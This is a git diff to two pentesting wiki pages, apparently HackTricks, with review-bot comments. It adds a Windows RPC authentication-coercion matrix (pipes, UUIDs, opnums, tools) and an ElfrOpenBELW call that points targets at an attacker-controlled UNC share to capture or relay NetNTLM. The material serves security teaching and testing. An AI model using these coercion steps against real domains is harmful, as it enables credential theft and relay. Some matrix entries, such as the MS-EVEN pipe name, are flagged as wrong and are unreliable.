diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. @@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index f00fdfbc6ee..2323634396e 100644 --- a/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md 
@@ -36,7 +36,7 @@ rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN ### Ask the service to authenticate against an arbitrary host -You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.** +You can compile [SpoolSample from here](https://github.com/NotMedic/NetNTLMtoSilverTicket). ```bash SpoolSample.exe 
@@ -53,12 +53,48 @@ printerbug.py 'domain/username:password'@ If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)). -## RCP Force authentication - - -{{#ref}} -https://github.com/p0dalirius/Coercer -{{#endref}} +## RPC Force authentication + +[Coercer](https://github.com/p0dalirius/Coercer) + +### RPC UNC-path coercion matrix (interfaces/opnums that trigger outbound auth) +- MS-RPRN (Print System Remote Protocol) + - Pipe: \\PIPE\\spoolss + - IF UUID: 12345678-1234-abcd-ef00-0123456789ab + - Opnums: 62 RpcRemoteFindFirstPrinterChangeNotification; 65 RpcRemoteFindFirstPrinterChangeNotificationEx + - Tools: PrinterBug / PrintNightmare-family +- MS-PAR (Print System Asynchronous Remote) + - Pipe: \\PIPE\\spoolss + - IF UUID: 76f03f96-cdfd-44fc-a22c-64950a001209 + - Opnum: 0 RpcAsyncOpenPrinter +- MS-EFSR (Encrypting File System Remote Protocol) + - Pipes: \\PIPE\\efsrpc (also via \\PIPE\\lsarpc, \\PIPE\\samr, \\PIPE\\lsass, \\PIPE\\netlogon) + - IF UUIDs: c681d488-d850-11d0-8c52-00c04fd90f7e ; df1941c5-fe89-4e79-bf10-463657acf44d + - Opnums commonly abused: 0, 4, 5, 6, 7, 12, 13, 15, 16 + - Tool: PetitPotam +- MS-DFSNM (DFS Namespace Management) + - Pipe: \\PIPE\\netdfs + - IF UUID: 4fc742e0-4a10-11cf-8273-00aa004ae673 + - Opnums: 12 NetrDfsAddStdRoot; 13 NetrDfsRemoveStdRoot + - Tool: DFSCoerce +- MS-FSRVP (File Server Remote VSS) + - Pipe: \\PIPE\\FssagentRpc + - IF UUID: a8e0653c-2744-4389-a61d-7373df8b2292 + - Opnums: 8 IsPathSupported; 9 IsPathShadowCopied + - Tool: ShadowCoerce +- MS-EVEN (EventLog Remoting) + - 
Pipe: \\PIPE\\even + - IF UUID: 82273fdc-e32a-18c3-3f78-827929dc23ea + - Opnum: 9 ElfrOpenBELW + - Tool: CheeseOunce + +Note: These methods accept parameters that can carry a UNC path (e.g., `\\attacker\share`). When processed, Windows will authenticate (machine/user context) to that UNC, enabling NetNTLM capture or relay. + +### MS-EVEN: ElfrOpenBELW (opnum 9) coercion +- Interface: MS-EVEN over \\PIPE\\even (IF UUID 82273fdc-e32a-18c3-3f78-827929dc23ea) +- Call signature: ElfrOpenBELW(UNCServerName, BackupFileName="\\\\attacker\\share\\backup.evt", MajorVersion=1, MinorVersion=1, LogHandle) +- Effect: the target attempts to open the supplied backup log path and authenticates to the attacker-controlled UNC. +- Practical use: coerce Tier 0 assets (DC/RODC/Citrix/etc.) to emit NetNTLM, then relay to AD CS endpoints (ESC8/ESC11 scenarios) or other privileged services. ## PrivExchange 
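Review bot: the MS-EVEN entry in the new coercion matrix, and the `### MS-EVEN: ElfrOpenBELW (opnum 9) coercion` subsection below it, name the endpoint `\\PIPE\\even`, but the EventLog Remoting Protocol is served over the `\PIPE\eventlog` named pipe (`even` is the interface name, not the pipe), so `Pipe: \\PIPE\\even` and `Interface: MS-EVEN over \\PIPE\\even` should both read `\\PIPE\\eventlog`; the UUID 82273fdc-e32a-18c3-3f78-827929dc23ea, opnum 9 and the ElfrOpenBELW call signature are correct. In the MS-RPRN entry, `Tools: PrinterBug / PrintNightmare-family` mixes in PrintNightmare, which abuses RpcAddPrinterDriverEx for code execution rather than opnums 62/65 for coercion, so either drop it or list it apart from the coercion tools. Style point: the hunk replaces the `{{#ref}} ... {{#endref}}` block for Coercer with a bare markdown link; since the page used the `{{#ref}}` form for that tool reference, keep the block (it can sit directly above the new matrix) so the rendering of tool references stays consistent.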
@@ -137,4 +173,13 @@ If you can perform a MitM attack to a computer and inject HTML in a page he will If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/index.html#ntlmv1-attack).\ _Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_ -{{#include ../../banners/hacktricks-training.md}} +## References +- [Unit 42 – Authentication Coercion Keeps Evolving](https://unit42.paloaltonetworks.com/authentication-coercion/) +- [Microsoft – MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f) +- [Microsoft – MS-EVEN: ElfrOpenBELW (Opnum 9)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) +- [p0dalirius – windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods) +- [PetitPotam (MS-EFSR)](https://github.com/topotam/PetitPotam) +- [DFSCoerce (MS-DFSNM)](https://github.com/Wh04m1001/DFSCoerce) +- [ShadowCoerce (MS-FSRVP)](https://github.com/ShutdownRepo/ShadowCoerce) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file
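Review bot: the new References list has no entry for CheeseOunce, which the coercion matrix added earlier in this patch cites as the MS-EVEN tool, nor for PrinterBug, while PetitPotam, DFSCoerce and ShadowCoerce each get a line; add the missing repositories so every tool named in the matrix resolves to a source. The hunk also moves `{{#include ../../banners/hacktricks-training.md}}` to the end of the file but leaves it without a trailing newline (`\ No newline at end of file` remains), whereas the first file in this patch was fixed to end with one; terminate this file with a newline as well.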